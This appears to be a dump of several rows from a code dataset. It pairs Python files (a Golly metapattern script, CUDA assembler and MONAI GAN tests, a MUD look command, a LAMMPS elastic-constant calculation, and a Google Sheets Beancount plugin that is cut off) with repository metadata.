import numpy as np
from shutil import copyfile
#Get the selection
selection = g.getselrect()
if not selection: g.exit("No selection.")
#Get the cells in the selection
cells = g.getcells(selection)
if not cells: g.exit("No pattern in selection")
if len(cells) % 3: cells = cells[:-1]
selw = selection[2]
selh = selection[3]
patternsize = 1 << int(np.ceil(np.log2(selh | selw)))
metapattern = np.zeros((patternsize, patternsize))
#Pseudo-convolution, to detect diagonal neighbors
# +1 +0 +2
# +0 *16 +0
# +4 +0 +8
for cell in np.reshape(cells, (-1, 3)):
selx = cell[0] - selection[0]
sely = cell[1] - selection[1]
metapattern[sely][selx] += 16 * cell[2]
if sely:
if selx:
metapattern[sely - 1][selx - 1] += 8
if selx + 1 < selw:
metapattern[sely - 1][selx + 1] += 4
if sely + 1 < selh:
if selx:
metapattern[sely + 1][selx - 1] += 2
if selx + 1 < selw:
metapattern[sely + 1][selx + 1] += 1
#Remove all B/S cells
metapattern[metapattern < 32] = np.nan
metapattern += 5630 - 32 #5632 is starting point of 11s in template
metapattern[np.isnan(metapattern)] = 0
metapattern = metapattern.astype(int)
#Using metatemplate11, memoization, and some recursion
def createLine(pattern, outfile, linenum = [5726], memo = {}): #linenum and memo are mutable function arguments, which are only initialized during function definition
if tuple(pattern.ravel().tolist()) not in memo: #If we haven't seen this type of pattern before, let's remember it
if pattern.shape[0] == 2: #Pattern is a leaf, write leaf line
outfile.write('{} {} {} {} {}\n'.format(pattern.shape[0].bit_length() + 10,
pattern[0, 0],
pattern[0, 1],
pattern[1, 0],
pattern[1, 1]))
else: #Pattern is a branch, keep going down quadtree
subpatterns = pattern.reshape(2, pattern.shape[0] >> 1, 2, pattern.shape[0] >> 1).swapaxes(1,2)
outfile.write('{} {} {} {} {}\n'.format(pattern.shape[0].bit_length() + 10,
createLine(subpatterns[0, 0], outfile),
createLine(subpatterns[0, 1], outfile),
createLine(subpatterns[1, 0], outfile),
createLine(subpatterns[1, 1], outfile)))
memo[tuple(pattern.ravel().tolist())] = linenum[0]
linenum[0] += 1
return memo[tuple(pattern.ravel().tolist())]
copyfile('metatemplate11.mc', 'output.mc')
with open('output.mc', 'a') as outputfile:
createLine(metapattern, outputfile)
#Display output.mc
g.addlayer()
g.open('output.mc')
#TODO: Use metatemplate10?
| 40.379747
| 167
| 0.551097
|
import golly as g
import numpy as np
from shutil import copyfile
selection = g.getselrect()
if not selection: g.exit("No selection.")
cells = g.getcells(selection)
if not cells: g.exit("No pattern in selection")
if len(cells) % 3: cells = cells[:-1]
selw = selection[2]
selh = selection[3]
patternsize = 1 << int(np.ceil(np.log2(selh | selw)))
metapattern = np.zeros((patternsize, patternsize))
for cell in np.reshape(cells, (-1, 3)):
selx = cell[0] - selection[0]
sely = cell[1] - selection[1]
metapattern[sely][selx] += 16 * cell[2]
if sely:
if selx:
metapattern[sely - 1][selx - 1] += 8
if selx + 1 < selw:
metapattern[sely - 1][selx + 1] += 4
if sely + 1 < selh:
if selx:
metapattern[sely + 1][selx - 1] += 2
if selx + 1 < selw:
metapattern[sely + 1][selx + 1] += 1
metapattern[metapattern < 32] = np.nan
metapattern += 5630 - 32
metapattern[np.isnan(metapattern)] = 0
metapattern = metapattern.astype(int)
def createLine(pattern, outfile, linenum = [5726], memo = {}):
if tuple(pattern.ravel().tolist()) not in memo:
if pattern.shape[0] == 2:
outfile.write('{} {} {} {} {}\n'.format(pattern.shape[0].bit_length() + 10,
pattern[0, 0],
pattern[0, 1],
pattern[1, 0],
pattern[1, 1]))
else:
subpatterns = pattern.reshape(2, pattern.shape[0] >> 1, 2, pattern.shape[0] >> 1).swapaxes(1,2)
outfile.write('{} {} {} {} {}\n'.format(pattern.shape[0].bit_length() + 10,
createLine(subpatterns[0, 0], outfile),
createLine(subpatterns[0, 1], outfile),
createLine(subpatterns[1, 0], outfile),
createLine(subpatterns[1, 1], outfile)))
memo[tuple(pattern.ravel().tolist())] = linenum[0]
linenum[0] += 1
return memo[tuple(pattern.ravel().tolist())]
copyfile('metatemplate11.mc', 'output.mc')
with open('output.mc', 'a') as outputfile:
createLine(metapattern, outputfile)
g.addlayer()
g.open('output.mc')
| true
| true
|
790b221d069713fd8fd1b1bc68f98ddc02ba0302
| 1,420
|
py
|
Python
|
Tests/test_CuInsAsmRepos_sm50.py
|
gxsaccount/CuAssembler
|
4542a3ee3fe4788bfd368a337e4c89ee288f0684
|
[
"MIT"
] | 100
|
2020-08-03T03:03:02.000Z
|
2022-03-23T15:46:58.000Z
|
Tests/test_CuInsAsmRepos_sm50.py
|
gxsaccount/CuAssembler
|
4542a3ee3fe4788bfd368a337e4c89ee288f0684
|
[
"MIT"
] | 6
|
2021-05-17T07:24:05.000Z
|
2022-02-08T11:29:44.000Z
|
Tests/test_CuInsAsmRepos_sm50.py
|
gxsaccount/CuAssembler
|
4542a3ee3fe4788bfd368a337e4c89ee288f0684
|
[
"MIT"
] | 25
|
2020-08-03T03:03:15.000Z
|
2022-02-24T12:57:40.000Z
|
# -*- coding: utf-8 -*-
from CuAsm.CuInsAssemblerRepos import CuInsAssemblerRepos
from CuAsm.CuInsFeeder import CuInsFeeder
def constructReposFromFile(sassname, savname=None, arch='sm_75'):
# initialize a feeder with sass
feeder = CuInsFeeder(sassname, arch=arch)
# initialize an empty repos
repos = CuInsAssemblerRepos(arch=arch)#
# Update the repos with instructions from feeder
repos.update(feeder)
# reset the feeder back to start
# feeder.restart()
# verify the repos
# actually the codes is already verifed during repos construction
# repos.verify(feeder)
if savname is not None:
repos.save2file(savname)
return repos
def verifyReposFromFile(sassname, reposfile, arch='sm_75'):
# initialize a feeder with sass
feeder = CuInsFeeder(sassname, arch=arch)
# initialize an empty repos
repos = CuInsAssemblerRepos(reposfile, arch=arch)#
# verify the repos
repos.verify(feeder)
if __name__ == '__main__':
sassname = r"G:\\Temp\\NVSASS\\cudnn64_7.sm_50.sass"
# sassname = r'G:\\Temp\\Program.45.sm_50.sass'
reposfile = r'InsAsmRepos.sm_50.txt'
arch = 'sm_50'
constructReposFromFile(sassname, reposfile, arch=arch)
print('### Construction done!')
# verifyReposFromFile(sassname, reposfile, arch=arch)
# print('### Verification done!')
| 27.307692
| 70
| 0.672535
|
from CuAsm.CuInsAssemblerRepos import CuInsAssemblerRepos
from CuAsm.CuInsFeeder import CuInsFeeder
def constructReposFromFile(sassname, savname=None, arch='sm_75'):
feeder = CuInsFeeder(sassname, arch=arch)
repos = CuInsAssemblerRepos(arch=arch)
repos.update(feeder)
if savname is not None:
repos.save2file(savname)
return repos
def verifyReposFromFile(sassname, reposfile, arch='sm_75'):
feeder = CuInsFeeder(sassname, arch=arch)
repos = CuInsAssemblerRepos(reposfile, arch=arch)
repos.verify(feeder)
if __name__ == '__main__':
sassname = r"G:\\Temp\\NVSASS\\cudnn64_7.sm_50.sass"
reposfile = r'InsAsmRepos.sm_50.txt'
arch = 'sm_50'
constructReposFromFile(sassname, reposfile, arch=arch)
print('### Construction done!')
| true
| true
|
790b222ea040908137c4f4b9fa62ce4fe964d3f9
| 5,498
|
py
|
Python
|
tests/test_integration_workflows_gan.py
|
Can-Zhao/MONAI
|
e29ef022b97a4e809dd22d4d208005f541ee061b
|
[
"Apache-2.0"
] | 3
|
2020-06-22T20:59:14.000Z
|
2021-04-09T21:24:45.000Z
|
tests/test_integration_workflows_gan.py
|
Borda/MONAI
|
e0db5a564225a7cb62e7a23df97267019006302f
|
[
"Apache-2.0"
] | null | null | null |
tests/test_integration_workflows_gan.py
|
Borda/MONAI
|
e0db5a564225a7cb62e7a23df97267019006302f
|
[
"Apache-2.0"
] | 1
|
2020-05-27T12:53:58.000Z
|
2020-05-27T12:53:58.000Z
|
# Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import shutil
import sys
import tempfile
import unittest
from glob import glob
import nibabel as nib
import numpy as np
import torch
import monai
from monai.data import create_test_image_2d
from monai.engines import GanTrainer
from monai.engines.utils import GanKeys as Keys
from monai.handlers import CheckpointSaver, StatsHandler, TensorBoardStatsHandler
from monai.networks import normal_init
from monai.networks.nets import Discriminator, Generator
from monai.transforms import AsChannelFirstd, Compose, LoadImaged, RandFlipd, ScaleIntensityd, ToTensord
from monai.utils import set_determinism
from tests.utils import DistTestCase, TimedCall, skip_if_quick
def run_training_test(root_dir, device="cuda:0"):
real_images = sorted(glob(os.path.join(root_dir, "img*.nii.gz")))
train_files = [{"reals": img} for img in zip(real_images)]
# prepare real data
train_transforms = Compose(
[
LoadImaged(keys=["reals"]),
AsChannelFirstd(keys=["reals"]),
ScaleIntensityd(keys=["reals"]),
RandFlipd(keys=["reals"], prob=0.5),
ToTensord(keys=["reals"]),
]
)
train_ds = monai.data.CacheDataset(data=train_files, transform=train_transforms, cache_rate=0.5)
train_loader = monai.data.DataLoader(train_ds, batch_size=2, shuffle=True, num_workers=4)
learning_rate = 2e-4
betas = (0.5, 0.999)
real_label = 1
fake_label = 0
# create discriminator
disc_net = Discriminator(
in_shape=(1, 64, 64), channels=(8, 16, 32, 64, 1), strides=(2, 2, 2, 2, 1), num_res_units=1, kernel_size=5
).to(device)
disc_net.apply(normal_init)
disc_opt = torch.optim.Adam(disc_net.parameters(), learning_rate, betas=betas)
disc_loss_criterion = torch.nn.BCELoss()
def discriminator_loss(gen_images, real_images):
real = real_images.new_full((real_images.shape[0], 1), real_label)
gen = gen_images.new_full((gen_images.shape[0], 1), fake_label)
realloss = disc_loss_criterion(disc_net(real_images), real)
genloss = disc_loss_criterion(disc_net(gen_images.detach()), gen)
return torch.div(torch.add(realloss, genloss), 2)
# create generator
latent_size = 64
gen_net = Generator(
latent_shape=latent_size, start_shape=(latent_size, 8, 8), channels=[32, 16, 8, 1], strides=[2, 2, 2, 1]
)
gen_net.apply(normal_init)
gen_net.conv.add_module("activation", torch.nn.Sigmoid())
gen_net = gen_net.to(device)
gen_opt = torch.optim.Adam(gen_net.parameters(), learning_rate, betas=betas)
gen_loss_criterion = torch.nn.BCELoss()
def generator_loss(gen_images):
output = disc_net(gen_images)
cats = output.new_full(output.shape, real_label)
return gen_loss_criterion(output, cats)
key_train_metric = None
train_handlers = [
StatsHandler(
name="training_loss", output_transform=lambda x: {Keys.GLOSS: x[Keys.GLOSS], Keys.DLOSS: x[Keys.DLOSS]}
),
TensorBoardStatsHandler(
log_dir=root_dir,
tag_name="training_loss",
output_transform=lambda x: {Keys.GLOSS: x[Keys.GLOSS], Keys.DLOSS: x[Keys.DLOSS]},
),
CheckpointSaver(
save_dir=root_dir, save_dict={"g_net": gen_net, "d_net": disc_net}, save_interval=2, epoch_level=True
),
]
disc_train_steps = 2
num_epochs = 5
trainer = GanTrainer(
device,
num_epochs,
train_loader,
gen_net,
gen_opt,
generator_loss,
disc_net,
disc_opt,
discriminator_loss,
d_train_steps=disc_train_steps,
latent_shape=latent_size,
key_train_metric=key_train_metric,
train_handlers=train_handlers,
)
trainer.run()
return trainer.state
@skip_if_quick
class IntegrationWorkflowsGAN(DistTestCase):
def setUp(self):
set_determinism(seed=0)
self.data_dir = tempfile.mkdtemp()
for i in range(40):
im, _ = create_test_image_2d(64, 64, num_objs=3, rad_max=14, num_seg_classes=1, channel_dim=-1)
n = nib.Nifti1Image(im, np.eye(4))
nib.save(n, os.path.join(self.data_dir, f"img{i:d}.nii.gz"))
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu:0")
monai.config.print_config()
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
def tearDown(self):
set_determinism(seed=None)
shutil.rmtree(self.data_dir)
@TimedCall(seconds=200, daemon=False)
def test_training(self):
torch.manual_seed(0)
finish_state = run_training_test(self.data_dir, device=self.device)
# assert GAN training finished
self.assertEqual(finish_state.iteration, 100)
self.assertEqual(finish_state.epoch, 5)
if __name__ == "__main__":
unittest.main()
| 34.3625
| 115
| 0.684613
|
import logging
import os
import shutil
import sys
import tempfile
import unittest
from glob import glob
import nibabel as nib
import numpy as np
import torch
import monai
from monai.data import create_test_image_2d
from monai.engines import GanTrainer
from monai.engines.utils import GanKeys as Keys
from monai.handlers import CheckpointSaver, StatsHandler, TensorBoardStatsHandler
from monai.networks import normal_init
from monai.networks.nets import Discriminator, Generator
from monai.transforms import AsChannelFirstd, Compose, LoadImaged, RandFlipd, ScaleIntensityd, ToTensord
from monai.utils import set_determinism
from tests.utils import DistTestCase, TimedCall, skip_if_quick
def run_training_test(root_dir, device="cuda:0"):
real_images = sorted(glob(os.path.join(root_dir, "img*.nii.gz")))
train_files = [{"reals": img} for img in zip(real_images)]
train_transforms = Compose(
[
LoadImaged(keys=["reals"]),
AsChannelFirstd(keys=["reals"]),
ScaleIntensityd(keys=["reals"]),
RandFlipd(keys=["reals"], prob=0.5),
ToTensord(keys=["reals"]),
]
)
train_ds = monai.data.CacheDataset(data=train_files, transform=train_transforms, cache_rate=0.5)
train_loader = monai.data.DataLoader(train_ds, batch_size=2, shuffle=True, num_workers=4)
learning_rate = 2e-4
betas = (0.5, 0.999)
real_label = 1
fake_label = 0
disc_net = Discriminator(
in_shape=(1, 64, 64), channels=(8, 16, 32, 64, 1), strides=(2, 2, 2, 2, 1), num_res_units=1, kernel_size=5
).to(device)
disc_net.apply(normal_init)
disc_opt = torch.optim.Adam(disc_net.parameters(), learning_rate, betas=betas)
disc_loss_criterion = torch.nn.BCELoss()
def discriminator_loss(gen_images, real_images):
real = real_images.new_full((real_images.shape[0], 1), real_label)
gen = gen_images.new_full((gen_images.shape[0], 1), fake_label)
realloss = disc_loss_criterion(disc_net(real_images), real)
genloss = disc_loss_criterion(disc_net(gen_images.detach()), gen)
return torch.div(torch.add(realloss, genloss), 2)
latent_size = 64
gen_net = Generator(
latent_shape=latent_size, start_shape=(latent_size, 8, 8), channels=[32, 16, 8, 1], strides=[2, 2, 2, 1]
)
gen_net.apply(normal_init)
gen_net.conv.add_module("activation", torch.nn.Sigmoid())
gen_net = gen_net.to(device)
gen_opt = torch.optim.Adam(gen_net.parameters(), learning_rate, betas=betas)
gen_loss_criterion = torch.nn.BCELoss()
def generator_loss(gen_images):
output = disc_net(gen_images)
cats = output.new_full(output.shape, real_label)
return gen_loss_criterion(output, cats)
key_train_metric = None
train_handlers = [
StatsHandler(
name="training_loss", output_transform=lambda x: {Keys.GLOSS: x[Keys.GLOSS], Keys.DLOSS: x[Keys.DLOSS]}
),
TensorBoardStatsHandler(
log_dir=root_dir,
tag_name="training_loss",
output_transform=lambda x: {Keys.GLOSS: x[Keys.GLOSS], Keys.DLOSS: x[Keys.DLOSS]},
),
CheckpointSaver(
save_dir=root_dir, save_dict={"g_net": gen_net, "d_net": disc_net}, save_interval=2, epoch_level=True
),
]
disc_train_steps = 2
num_epochs = 5
trainer = GanTrainer(
device,
num_epochs,
train_loader,
gen_net,
gen_opt,
generator_loss,
disc_net,
disc_opt,
discriminator_loss,
d_train_steps=disc_train_steps,
latent_shape=latent_size,
key_train_metric=key_train_metric,
train_handlers=train_handlers,
)
trainer.run()
return trainer.state
@skip_if_quick
class IntegrationWorkflowsGAN(DistTestCase):
def setUp(self):
set_determinism(seed=0)
self.data_dir = tempfile.mkdtemp()
for i in range(40):
im, _ = create_test_image_2d(64, 64, num_objs=3, rad_max=14, num_seg_classes=1, channel_dim=-1)
n = nib.Nifti1Image(im, np.eye(4))
nib.save(n, os.path.join(self.data_dir, f"img{i:d}.nii.gz"))
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu:0")
monai.config.print_config()
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
def tearDown(self):
set_determinism(seed=None)
shutil.rmtree(self.data_dir)
@TimedCall(seconds=200, daemon=False)
def test_training(self):
torch.manual_seed(0)
finish_state = run_training_test(self.data_dir, device=self.device)
self.assertEqual(finish_state.iteration, 100)
self.assertEqual(finish_state.epoch, 5)
if __name__ == "__main__":
unittest.main()
| true
| true
|
790b228e8aa5bf49b0e1e3268923018c40afca2b
| 753
|
py
|
Python
|
cwmud/core/commands/info/look.py
|
whutch/cwmud
|
bee8b126a5e70edd0593dae9753a6be8d52357cf
|
[
"MIT"
] | 11
|
2016-03-03T03:56:59.000Z
|
2021-11-19T15:38:51.000Z
|
cwmud/core/commands/info/look.py
|
whutch/atria
|
bee8b126a5e70edd0593dae9753a6be8d52357cf
|
[
"MIT"
] | 26
|
2016-08-31T23:19:45.000Z
|
2019-10-19T21:50:33.000Z
|
cwmud/core/commands/info/look.py
|
whutch/atria
|
bee8b126a5e70edd0593dae9753a6be8d52357cf
|
[
"MIT"
] | 2
|
2016-01-22T21:22:34.000Z
|
2016-02-09T06:03:57.000Z
|
# -*- coding: utf-8 -*-
"""Look command."""
# Part of Clockwork MUD Server (https://github.com/whutch/cwmud)
# :copyright: (c) 2008 - 2017 Will Hutcheson
# :license: MIT (https://github.com/whutch/cwmud/blob/master/LICENSE.txt)
from .. import Command, COMMANDS
from ...characters import CharacterShell
@COMMANDS.register
class LookCommand(Command):
"""A command to allow a character to look at things."""
def _action(self):
char = self.session.char
if not char:
self.session.send("You're not playing a character!")
return
if not char.room:
self.session.send("You're not in a room!")
return
char.show_room()
CharacterShell.add_verbs(LookCommand, "look", "l")
| 26.892857
| 73
| 0.640106
|
from .. import Command, COMMANDS
from ...characters import CharacterShell
@COMMANDS.register
class LookCommand(Command):
def _action(self):
char = self.session.char
if not char:
self.session.send("You're not playing a character!")
return
if not char.room:
self.session.send("You're not in a room!")
return
char.show_room()
CharacterShell.add_verbs(LookCommand, "look", "l")
| true
| true
|
790b22f67984acbc1adc70e328564f8496f2231c
| 2,925
|
py
|
Python
|
examples/elastic.py
|
costrouc/pymatgen-lammps
|
0e1aee4c4c93a62ac3648086d3007be7c2ce20a1
|
[
"MIT"
] | 3
|
2020-07-01T07:59:42.000Z
|
2022-01-19T07:19:08.000Z
|
examples/elastic.py
|
costrouc/pymatgen-lammps
|
0e1aee4c4c93a62ac3648086d3007be7c2ce20a1
|
[
"MIT"
] | null | null | null |
examples/elastic.py
|
costrouc/pymatgen-lammps
|
0e1aee4c4c93a62ac3648086d3007be7c2ce20a1
|
[
"MIT"
] | 4
|
2020-07-26T03:30:52.000Z
|
2021-08-09T21:26:00.000Z
|
# Calculation the Elastic Constants from given deformations
import os
import subprocess
from pymatgen import Structure, Lattice, Specie
from pymatgen.analysis.elasticity import DeformedStructureSet, Strain, Stress, ElasticTensor
from pmg_lammps import RelaxSet, LammpsLog, LammpsData, LammpsPotentials
supercell = (5, 5, 5)
a = 4.1990858 # From evaluation of potential
lattice = Lattice.from_parameters(a, a, a, 90, 90, 90)
mg = Specie('Mg', 1.4)
o = Specie('O', -1.4)
atoms = [mg, o]
sites = [[0, 0, 0], [0.5, 0.5, 0.5]]
structure = Structure.from_spacegroup(225, lattice, atoms, sites)
initial_structure = structure * supercell
directory = 'runs/elastic'
num_normal = 10
num_shear = 10
max_normal = 0.03
max_shear = 0.08
lammps_potentials = LammpsPotentials(pair={
(mg, mg): '1309362.2766468062 0.104 0.0',
(mg, o ): '9892.357 0.20199 0.0',
(o , o ): '2145.7345 0.3 30.2222'
})
mgo_potential_settings = [
('pair_style', 'buck/coul/long 10.0'),
('kspace_style', 'pppm 1.0e-5'),
]
print('Performing Strained Calculations')
strained_structures = []
deformation_set = DeformedStructureSet(structure, nd=max_normal, ns=max_shear,
num_norm=num_normal, num_shear=num_shear)
for i, deformation in enumerate(deformation_set.deformations):
deformation_directory = os.path.join(directory, str(i))
print('Deformation', i)
strain = Strain.from_deformation(deformation)
strained_structure = deformation.apply_to_structure(initial_structure)
lammps_data = LammpsData.from_structure(strained_structure, potentials=lammps_potentials,
include_charge=True)
lammps_set = RelaxSet(lammps_data, relax_box=False, user_lammps_settings=[
] + mgo_potential_settings)
lammps_set.write_input(deformation_directory)
subprocess.call(['lammps', '-i', 'lammps.in'], cwd=deformation_directory, stdout=subprocess.PIPE)
lammps_log = LammpsLog(os.path.join(deformation_directory, 'lammps.log'))
stress = Stress(lammps_log.get_stress(-1))
strained_structures.append({
'strain': strain,
'structrure': strained_structure,
'stress': stress / -10000.0 # bar to GPa
})
strains = [defo['strain'] for defo in strained_structures]
stresses = [defo['stress'] for defo in strained_structures]
elastic = ElasticTensor.from_pseudoinverse(strains, stresses)
print('Stiffness Tensor')
for row in elastic.voigt:
print('{:+8.1f} {:+8.1f} {:+8.1f} {:+8.1f} {:+8.1f} {:+8.1f}\n'.format(*row))
print('Shear Modulus G_V', elastic.g_voigt)
print('Shear Modulus G_R', elastic.g_reuss)
print('Shear Modulus G_vrh', elastic.g_vrh)
print('Bulk Modulus K_V', elastic.k_voigt)
print('Bulk Modulus K_R', elastic.k_reuss)
print('Bulk Modulus K_vrh', elastic.k_vrh)
print('Elastic Anisotropy', elastic.universal_anisotropy)
print('Poisons Ration', elastic.homogeneous_poisson)
| 35.240964
| 101
| 0.709744
|
import os
import subprocess
from pymatgen import Structure, Lattice, Specie
from pymatgen.analysis.elasticity import DeformedStructureSet, Strain, Stress, ElasticTensor
from pmg_lammps import RelaxSet, LammpsLog, LammpsData, LammpsPotentials
supercell = (5, 5, 5)
a = 4.1990858
lattice = Lattice.from_parameters(a, a, a, 90, 90, 90)
mg = Specie('Mg', 1.4)
o = Specie('O', -1.4)
atoms = [mg, o]
sites = [[0, 0, 0], [0.5, 0.5, 0.5]]
structure = Structure.from_spacegroup(225, lattice, atoms, sites)
initial_structure = structure * supercell
directory = 'runs/elastic'
num_normal = 10
num_shear = 10
max_normal = 0.03
max_shear = 0.08
lammps_potentials = LammpsPotentials(pair={
(mg, mg): '1309362.2766468062 0.104 0.0',
(mg, o ): '9892.357 0.20199 0.0',
(o , o ): '2145.7345 0.3 30.2222'
})
mgo_potential_settings = [
('pair_style', 'buck/coul/long 10.0'),
('kspace_style', 'pppm 1.0e-5'),
]
print('Performing Strained Calculations')
strained_structures = []
deformation_set = DeformedStructureSet(structure, nd=max_normal, ns=max_shear,
num_norm=num_normal, num_shear=num_shear)
for i, deformation in enumerate(deformation_set.deformations):
deformation_directory = os.path.join(directory, str(i))
print('Deformation', i)
strain = Strain.from_deformation(deformation)
strained_structure = deformation.apply_to_structure(initial_structure)
lammps_data = LammpsData.from_structure(strained_structure, potentials=lammps_potentials,
include_charge=True)
lammps_set = RelaxSet(lammps_data, relax_box=False, user_lammps_settings=[
] + mgo_potential_settings)
lammps_set.write_input(deformation_directory)
subprocess.call(['lammps', '-i', 'lammps.in'], cwd=deformation_directory, stdout=subprocess.PIPE)
lammps_log = LammpsLog(os.path.join(deformation_directory, 'lammps.log'))
stress = Stress(lammps_log.get_stress(-1))
strained_structures.append({
'strain': strain,
'structrure': strained_structure,
'stress': stress / -10000.0
})
strains = [defo['strain'] for defo in strained_structures]
stresses = [defo['stress'] for defo in strained_structures]
elastic = ElasticTensor.from_pseudoinverse(strains, stresses)
print('Stiffness Tensor')
for row in elastic.voigt:
print('{:+8.1f} {:+8.1f} {:+8.1f} {:+8.1f} {:+8.1f} {:+8.1f}\n'.format(*row))
print('Shear Modulus G_V', elastic.g_voigt)
print('Shear Modulus G_R', elastic.g_reuss)
print('Shear Modulus G_vrh', elastic.g_vrh)
print('Bulk Modulus K_V', elastic.k_voigt)
print('Bulk Modulus K_R', elastic.k_reuss)
print('Bulk Modulus K_vrh', elastic.k_vrh)
print('Elastic Anisotropy', elastic.universal_anisotropy)
print('Poisons Ration', elastic.homogeneous_poisson)
| true
| true
|
790b24e08d1689ac5a8a136a2200ec96e8902f61
| 9,780
|
py
|
Python
|
src/coolbeans/plugins/sheetsaccount.py
|
runarp/coolbeans
|
128a7f2e45690d2d22b05608e555c44334f46859
|
[
"MIT"
] | 5
|
2020-05-17T04:48:25.000Z
|
2022-01-27T09:36:45.000Z
|
src/coolbeans/plugins/sheetsaccount.py
|
runarp/coolbeans
|
128a7f2e45690d2d22b05608e555c44334f46859
|
[
"MIT"
] | 1
|
2020-05-17T06:21:52.000Z
|
2020-05-22T13:49:33.000Z
|
src/coolbeans/plugins/sheetsaccount.py
|
runarp/coolbeans
|
128a7f2e45690d2d22b05608e555c44334f46859
|
[
"MIT"
] | 1
|
2021-01-28T03:00:27.000Z
|
2021-01-28T03:00:27.000Z
|
"""
# Sheets Account
Read a Google Sheet as if it were are realtime source of transactions
for a GL account. Columns are mapped to attributes. The
assumption is that the sheet maps to a single account, and the
rows are the credit/debits to that account.
Can be used as a plugin, which will write new entries (for reference)
to a file, but also maintain a "live" view of the transactions.
We support most of the sane columns on a sheet:
- date
- narration
- payee
- account
- amount
- currency
- tags
- links
- Anything else, if non-empty cell, gets added as a META
Some things to look at are:
- Multi-currency Support
- Lot support?
- Other Directives: Note, Document, Balance?
- Smarter per-sheet caching of local results
I strongly suggest using "Transfer" accounts for all asset movements between
two accounts both of which are tracked via a Sheet. This simplifies the
"Matching" and allows each side to be reconciled independently.
TODO: Default Account when account column is blank?
"""
# stdlib imports
import logging
import decimal
import pprint
import typing
import datetime
import dateparser
import pathlib
import slugify
# Beancount imports
from beancount.core import data
from coolbeans.utils import safe_plugin, get_setting
from coolbeans.tools.sheets import google_connect, safe_open_sheet
from coolbeans.plugins.accountsync import apply_coolbean_settings
import gspread
STRIP_SYMOLS = '₱$'
DEFAULT_CURRENCY = "USD"
logger = logging.getLogger(__name__)
__plugins__ = ['apply_coolbean_settings', 'remote_entries_plugin']
def clean_slug(slug):
"""Clean a possible Slug string to remove dashes and lower case."""
return slug.replace('-', '').lower()
def coolbean_sheets(entries, context):
"""Given a set of entries, pull out any slugs and add them to the context"""
settings = context.setdefault('coolbean-accounts', {})
# Pull out any 'slug' meta data
for entry in entries:
if isinstance(entry, data.Open):
document = entry.meta.get('document_name', None)
tab = entry.meta.get('document_tab', None)
slug = entry.meta.get('slug', "")
if document and tab and slug:
settings[slug] = {
'account': entry.account,
'document': document,
'tab': tab,
'currencies': entry.currencies
}
else:
if document or tab:
print(f"Skipping {entry.account}: {document}/{tab}/{slug}")
return entries, []
def remote_entries(entries, options_map):
"""
@param entries:
@param options_map:
@return:
"""
errors = []
settings = options_map['coolbeans']
secrets_file = get_setting('google-apis', settings)
connection = google_connect(secrets_file)
new_entries_path = None
new_entries_file = get_setting('new-entries-bean', settings)
if new_entries_file:
new_entries_path = pathlib.Path(new_entries_file)
# Capture the configuration off the Open
remote_accounts = {}
for entry in entries:
if not isinstance(entry, data.Open):
continue
document_name = entry.meta.get('document_name', None)
default_currency = entry.currencies[0] if entry.currencies else DEFAULT_CURRENCY
if document_name:
options = dict(
document_name=document_name,
document_tab=entry.meta.get('document_tab', None),
reverse_amount=entry.meta.get('reverse', False),
default_currency=default_currency,
entry=entry,
entry_file=new_entries_path
)
remote_accounts[entry.account] = options
new_entries = []
for account, options in remote_accounts.items():
try:
new_entries += load_remote_account(
connection=connection,
errors=errors,
account=account,
options=options
)
except Exception as exc:
logger.error(f"while processing {account}", exc_info=exc)
if new_entries and new_entries_path:
from beancount.parser import printer
with new_entries_path.open("w") as stream:
printer.print_entries(new_entries, file=stream)
logger.info(f"Wrote {len(new_entries)} new account(s) to {new_entries_path}.")
return entries+new_entries, errors
remote_entries_plugin = safe_plugin(remote_entries)
ALIASES = {
'narration': ['description', 'notes', 'details', 'memo']
}
def clean_record(record: typing.Dict[str, str]):
"""This is a bit of a hack. But using get_all_records doesn't leave many
options"""
new_record = {}
for k, v in record.items():
k = slugify.slugify(k.lower().strip())
v = str(v)
# Combine multiple narration columns if needed:
for field, names in ALIASES.items():
new_record.setdefault(field, '')
if k in names:
# Add the value to Narration:
new_record[field] += ('. ' if new_record[field] else '') + v
k = None # Clear this Key
break
# Really Ugly hack around embeded currency symbols. Needs Cleanup
if k == 'amount':
v = v.replace(',', '')
for s in STRIP_SYMOLS:
v = v.replace(s, '')
if v and not v[0].isdecimal() and not v[0]=='-':
v = v[1:]
# Pull currency?
# Decimal is fussy
try:
v = decimal.Decimal(v)
except decimal.InvalidOperation:
v = 0
if k:
new_record[k] = v
return new_record
def load_remote_account(
connection: gspread.Client,
errors: list,
account: str,
options: typing.Dict[str, str]
):
"""Try to Load Entries from URL into Account.
options include:
- document_name -- the Actual Google Doc name
- document_tab -- the Tab name on the Doc
- default_currency - the entry currency if None is provided
- reverse_amount - if true, assume positive entries are credits
"""
entries = []
document_name = options['document_name']
document_tab = options.get('document_tab', 0) or 0
default_currency = options['default_currency']
reverse_amount = options.get('reverse_amount', False)
if not document_name:
return
m = -1 if reverse_amount else 1
logger.info(f"Attempting to download entries for {account} from {document_name}.{document_tab}")
workbook = connection.open(document_name)
sheet = None
try:
document_tab = int(document_tab)
sheet = workbook.get_worksheet(document_tab)
except ValueError:
pass
if sheet is None:
sheet = workbook.worksheet(document_tab)
records = sheet.get_all_records()
import re
row = 0
# logger.info(f"Found {len(records)} entries.")
for record in records:
row += 1
record = clean_record(record)
if 'date' not in record or not record['date']:
continue
if 'amount' not in record or not record['amount']:
continue
#if 'account' not in record or not record['account'].strip():
# continue
narration = record.pop('narration', None)
payee = record.pop('payee', None)
tagstr = record.pop('tags', '')
tags = set(re.split(r'\W+', tagstr)) if tagstr else set()
date = dateparser.parse(record.pop('date'))
if date:
date = datetime.date(year=date.year, month=date.month, day=date.day)
linkstr = record.pop('links', '')
links = set(re.split(r'\W+', linkstr)) if linkstr else set()
meta = {
'filename': str(options['entry_file']),
'lineno': 0,
'document-sheet-row': f"{document_name}/{document_tab}/{row+1}"
}
amount = decimal.Decimal(record.pop('amount')) * m
currency = record.pop('currency', default_currency)
